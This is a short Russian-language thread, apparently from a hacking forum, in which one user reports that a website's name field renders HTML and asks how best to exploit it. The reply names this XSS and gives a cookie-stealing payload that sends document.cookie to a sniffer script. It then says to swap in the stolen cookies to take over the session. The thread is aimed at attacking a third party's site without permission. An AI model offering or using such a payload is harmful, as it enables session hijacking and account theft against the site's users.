При вводе имени работают теги!

Discussion in 'Песочница' started by Poacher, 1 Feb 2006.

  1. Poacher

    Poacher New Member

    Joined:
    27 Dec 2005
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Здрасти есть один сайт. При вводе имени в форму <form> можно вводить теги и они работают, а при попытке вводить (примерно) <? echo data("s = h = m")?> в тексте оказывается слеши перед кавычками <? echo data(/"s = h = m/")?> и ни че не работает, а простые теги html работают все!

    Суть вопроса: на сколько опасна данная уязвимость, и как её лутше использовать.
     
  2. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    В умелых руках уязвимость довольно опасна! Это так называемая XSS.

    пишешь что то типа
    <img src=javascript:aa=new Image();aa.src=&quot;/cgi-bin/s.gif?&quot;+document.cookie;>
    и если все пройдет ok на antichat'овский снифер придут куки. Дальше ты свои заменяешь на угнанные куки и юзаешь их по назначению. =)